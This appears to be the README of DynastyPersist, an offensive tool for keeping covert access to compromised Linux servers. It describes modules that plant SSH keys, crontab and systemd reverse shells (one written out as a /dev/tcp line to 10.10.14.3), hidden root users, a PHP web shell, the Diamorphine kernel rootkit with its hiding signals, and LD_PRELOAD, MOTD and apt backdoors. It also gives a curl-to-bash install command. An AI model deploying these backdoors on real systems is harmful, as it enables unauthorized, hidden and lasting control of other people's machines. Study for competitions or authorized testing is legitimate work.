DynastyPersist: A streamlined tool for achieving Linux persistence effortlessly.
Supports KoTH, Battlegrounds and Pentest Operations

Install • Documentation • Usage

• Gain access to a server using ssh key generation. This module creates an id_rsa key for every user. Which can be used for reverse access. After, running this module the attacker can connect to the server via ssh.

• This can be manually done using the ssh-keygen command. However, the module creates a private key for every user in no time.

root@kali ~ ssh -i id_rsa root@10.10.110.101

• Module Number: 1

• Cronjobs in Linux are scheduled tasks that run automatically at specified intervals.

• One of the most efficient modules, that involves reverse shells. This module directly writes reverse shell commands to /etc/crontab. Which will pop up a shell in the port you listening to.

root@kali ~ nc -nvlp 9999

• Module Number: 2

• A simple and fast method to gain reverse access. Simply, this module creates another user with root access. Later on, the attacker can login to the user via ssh.

root@kali ~ ssh newuser@10.10.110.101

• Module Number: 3

• This module, comes with a php script that is hosted in the web root directory. The script is located in /var/www/html/dynasty_rce/rce.php. Further, the prefix dynasty_rce can be hidden if the LKM module is run before.

• Visiting victim_ip:port/dynasty_rce/rce.php will give you the power to run commands within the shell.

• Module Number: 4

• An advanced persistence method, that implants a rootkit to the server's kernel. The program focuses on an open-source LKM rootkit called Diamorphine. The module is in /var/tmp/.memory as a temporary location. This directory is deleted after the module is set up.
• The below code block shows the uses of this module.

victim@ubuntu ~ kill -64 0 # Promtes to root user. 
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself 
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output

• Module Number: 5

• This module, writes reverse shell commands, aliases, and variables for reverse access. A shell is gifted when a user logs in to the server or the person uses find or cat.

root@kali ~ nc -nvlp 9999

• Module Number: 6

• A module that creates a custom service in systemd for reverse access.

• An example:

Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"

• The above example, will be created as a service. This method is efficient and durable.

• Module Number: 7

• LD_PRELOAD is an environment variable in Linux that allows users to pre-load a shared library before other libraries. Privilege escalation using LD_PRELOAD involves loading a malicious library to intercept and modify system calls, potentially gaining elevated privileges. The module backdoors command like find and wget.

• Module Number: 8

• The "Message of the Day" (MOTD) in Linux is a customizable text displayed to users upon login, providing information or updates about the system. It is typically stored in the /etc/motd file and can be modified by system administrators.

• This module, writes a shell to /etc/update-motd.d/00-header. This is typically, triggered when a user logs in.

• Module Number: 9

• Similar to module 7, this one modifies an existing service for reverse access.

• Simply, it rewrites the ExecStartPre in the service to a reverse shell command.

• Module Number: 10

• "APT" stands for Advanced Package Tool, and it's commonly used in Debian-based systems such as Ubuntu. The file will be here: /etc/apt/apt.conf.d/42backdoor

• Backdoors the apt command, whenever apt is run it'll pop up a shell.

• Module Number: 11

• Currently, there are 2 modes available in the latest update (1.4).

• Modes are console and ctf which are designed to work in a specific behavior.

• In comparison, the console mode comes with more features and stability than the ctf mode.

• console mode enters the tool in the usual setup, with all features. These features will run locally on the local host where the script is being executed. Designed for persistence in real-time operations.

• The prefix use followed by the module number will be used to run any selected module. Like, use 1

• Also, the interface is updated the modules/payloads are now visible when you type show payloads.

• Lastly, the help/options menu is also modified enter show options to view it.

• ctf mode is an extra feature to log in to a compromised server via SSH and gain persistence. This addon will help a lot in KoTH or Battlegrounds. Further, this will save a lot of time taken for setting up persistence.

• Runs most of the functions in console.

• The syntax to use the tool is described below:

$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

Via Git

$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

Via Curl

$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash